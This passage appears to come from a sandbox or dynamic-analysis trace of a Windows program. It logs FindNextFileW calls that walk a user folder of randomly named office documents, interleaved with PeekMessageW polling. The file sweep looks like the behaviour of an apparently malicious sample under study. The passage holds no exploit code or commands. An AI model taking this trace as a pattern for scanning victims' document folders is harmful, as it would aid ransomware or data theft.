lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.155] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1de04d10, ftCreationTime.dwHighDateTime=0x1d57ac6, ftLastAccessTime.dwLowDateTime=0xdc073890, ftLastAccessTime.dwHighDateTime=0x1d5b738, ftLastWriteTime.dwLowDateTime=0xdc073890, ftLastWriteTime.dwHighDateTime=0x1d5b738, nFileSizeHigh=0x0, nFileSizeLow=0x9adc, dwReserved0=0x0, dwReserved1=0x0, cFileName="lC9iCEh8edFMc0F.xlsx", cAlternateFileName="LC9ICE~1.XLS")) returned 1 [0259.155] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.156] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.156] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.156] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.156] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.157] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcf9a320, ftCreationTime.dwHighDateTime=0x1d5d8fd, ftLastAccessTime.dwLowDateTime=0x568f9170, ftLastAccessTime.dwHighDateTime=0x1d567a2, ftLastWriteTime.dwLowDateTime=0x568f9170, ftLastWriteTime.dwHighDateTime=0x1d567a2, nFileSizeHigh=0x0, nFileSizeLow=0xd8c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Lci9q.pptx", cAlternateFileName="LCI9Q~1.PPT")) returned 1 [0259.157] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.157] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.157] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.157] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.157] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.157] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37aaf350, ftCreationTime.dwHighDateTime=0x1d58910, ftLastAccessTime.dwLowDateTime=0x9afaf140, ftLastAccessTime.dwHighDateTime=0x1d58b71, ftLastWriteTime.dwLowDateTime=0x9afaf140, ftLastWriteTime.dwHighDateTime=0x1d58b71, nFileSizeHigh=0x0, nFileSizeLow=0x53c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="MvKsZ2f3N9SAK.pptx", cAlternateFileName="MVKSZ2~1.PPT")) returned 1 [0259.157] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.157] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.157] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.158] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.158] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.158] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0259.158] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.158] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.158] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.158] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.158] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0259.158] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.158] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.158] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.159] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.159] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc1a0f60e, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bc4716, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0259.159] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.159] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.159] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.159] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.159] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0259.159] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.159] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.159] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.159] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.160] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86f73ae0, ftCreationTime.dwHighDateTime=0x1d573b2, ftLastAccessTime.dwLowDateTime=0x6a3678a0, ftLastAccessTime.dwHighDateTime=0x1d5e147, ftLastWriteTime.dwLowDateTime=0x6a3678a0, ftLastWriteTime.dwHighDateTime=0x1d5e147, nFileSizeHigh=0x0, nFileSizeLow=0x17c5, dwReserved0=0x0, dwReserved1=0x0, cFileName="nBWvBa.pptx", cAlternateFileName="NBWVBA~1.PPT")) returned 1 [0259.160] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.160] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.160] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.160] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.160] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.160] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbfb0cbf0, ftCreationTime.dwHighDateTime=0x1d5e737, ftLastAccessTime.dwLowDateTime=0xcac8f630, ftLastAccessTime.dwHighDateTime=0x1d5e506, ftLastWriteTime.dwLowDateTime=0xcac8f630, ftLastWriteTime.dwHighDateTime=0x1d5e506, nFileSizeHigh=0x0, nFileSizeLow=0x13e31, dwReserved0=0x0, dwReserved1=0x0, cFileName="nuI2xgrk2vyv2-2D.pps", cAlternateFileName="NUI2XG~1.PPS")) returned 1 [0259.160] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.160] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.160] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.160] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.160] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.161] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0x5ee892ad, ftLastAccessTime.dwHighDateTime=0x1d5e877, ftLastWriteTime.dwLowDateTime=0x5ee892ad, ftLastWriteTime.dwHighDateTime=0x1d5e877, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0259.161] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.161] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.161] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.161] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.161] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f59cac0, ftCreationTime.dwHighDateTime=0x1d5ef53, ftLastAccessTime.dwLowDateTime=0x311e1fb0, ftLastAccessTime.dwHighDateTime=0x1d5e669, ftLastWriteTime.dwLowDateTime=0x311e1fb0, ftLastWriteTime.dwHighDateTime=0x1d5e669, nFileSizeHigh=0x0, nFileSizeLow=0x142d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="pFCcGpVbcXPSBWLa.pps", cAlternateFileName="PFCCGP~1.PPS")) returned 1 [0259.161] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.161] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.161] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.161] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.161] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.162] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25cc7eb0, ftCreationTime.dwHighDateTime=0x1d5e554, ftLastAccessTime.dwLowDateTime=0x29510eb0, ftLastAccessTime.dwHighDateTime=0x1d5e65e, ftLastWriteTime.dwLowDateTime=0x29510eb0, ftLastWriteTime.dwHighDateTime=0x1d5e65e, nFileSizeHigh=0x0, nFileSizeLow=0xf68f, dwReserved0=0x0, dwReserved1=0x0, cFileName="pTQouiVh4lNVdQWF_W.rtf", cAlternateFileName="PTQOUI~1.RTF")) returned 1 [0259.162] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.162] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.162] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.162] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.162] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.162] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29f367b0, ftCreationTime.dwHighDateTime=0x1d5e2c5, ftLastAccessTime.dwLowDateTime=0x6beea0f0, ftLastAccessTime.dwHighDateTime=0x1d5e45d, ftLastWriteTime.dwLowDateTime=0x6beea0f0, ftLastWriteTime.dwHighDateTime=0x1d5e45d, nFileSizeHigh=0x0, nFileSizeLow=0x850b, dwReserved0=0x0, dwReserved1=0x0, cFileName="R8WIHAk.pdf", cAlternateFileName="")) returned 1 [0259.162] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.162] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.162] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.162] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.162] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.163] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe825e1e0, ftCreationTime.dwHighDateTime=0x1d5ab39, ftLastAccessTime.dwLowDateTime=0xb00c280, ftLastAccessTime.dwHighDateTime=0x1d566c4, ftLastWriteTime.dwLowDateTime=0xb00c280, ftLastWriteTime.dwHighDateTime=0x1d566c4, nFileSizeHigh=0x0, nFileSizeLow=0x6794, dwReserved0=0x0, dwReserved1=0x0, cFileName="S7DDzGLO.docx", cAlternateFileName="S7DDZG~1.DOC")) returned 1 [0259.163] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.163] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.163] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.163] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.163] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.163] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eaadf30, ftCreationTime.dwHighDateTime=0x1d5b702, ftLastAccessTime.dwLowDateTime=0xdfa92990, ftLastAccessTime.dwHighDateTime=0x1d581a5, ftLastWriteTime.dwLowDateTime=0xdfa92990, ftLastWriteTime.dwHighDateTime=0x1d581a5, nFileSizeHigh=0x0, nFileSizeLow=0x11319, dwReserved0=0x0, dwReserved1=0x0, cFileName="vai5o9F.pptx", cAlternateFileName="VAI5O9~1.PPT")) returned 1 [0259.163] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.163] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.163] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.163] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.164] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.164] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bfe5970, ftCreationTime.dwHighDateTime=0x1d5db78, ftLastAccessTime.dwLowDateTime=0x72fe6bb0, ftLastAccessTime.dwHighDateTime=0x1d5a50a, ftLastWriteTime.dwLowDateTime=0x72fe6bb0, ftLastWriteTime.dwHighDateTime=0x1d5a50a, nFileSizeHigh=0x0, nFileSizeLow=0x731b, dwReserved0=0x0, dwReserved1=0x0, cFileName="VQCf4sXQz0.docx", cAlternateFileName="VQCF4S~1.DOC")) returned 1 [0259.164] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.164] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.164] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.164] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.164] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.164] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1c2ebe0, ftCreationTime.dwHighDateTime=0x1d5e242, ftLastAccessTime.dwLowDateTime=0xe8042a30, ftLastAccessTime.dwHighDateTime=0x1d5f073, ftLastWriteTime.dwLowDateTime=0xe8042a30, ftLastWriteTime.dwHighDateTime=0x1d5f073, nFileSizeHigh=0x0, nFileSizeLow=0x67fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="y89VhZ.rtf", cAlternateFileName="")) returned 1 [0259.164] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.164] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.165] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.165] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.165] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.165] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1259e1c0, ftCreationTime.dwHighDateTime=0x1d5ed73, ftLastAccessTime.dwLowDateTime=0xfd20f8d0, ftLastAccessTime.dwHighDateTime=0x1d5e6a0, ftLastWriteTime.dwLowDateTime=0xfd20f8d0, ftLastWriteTime.dwHighDateTime=0x1d5e6a0, nFileSizeHigh=0x0, nFileSizeLow=0x119ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="ypyYdQHgVdPHUEe.odt", cAlternateFileName="YPYYDQ~1.ODT")) returned 1 [0259.165] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.165] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.165] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.165] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.165] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.165] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb93d9c80, ftCreationTime.dwHighDateTime=0x1d59d68, ftLastAccessTime.dwLowDateTime=0xd7de4a50, ftLastAccessTime.dwHighDateTime=0x1d5c94a, ftLastWriteTime.dwLowDateTime=0xd7de4a50, ftLastWriteTime.dwHighDateTime=0x1d5c94a, nFileSizeHigh=0x0, nFileSizeLow=0x4dbb, dwReserved0=0x0, dwReserved1=0x0, cFileName="zP4h.xlsx", cAlternateFileName="ZP4H~1.XLS")) returned 1 [0259.165] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0259.166] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, 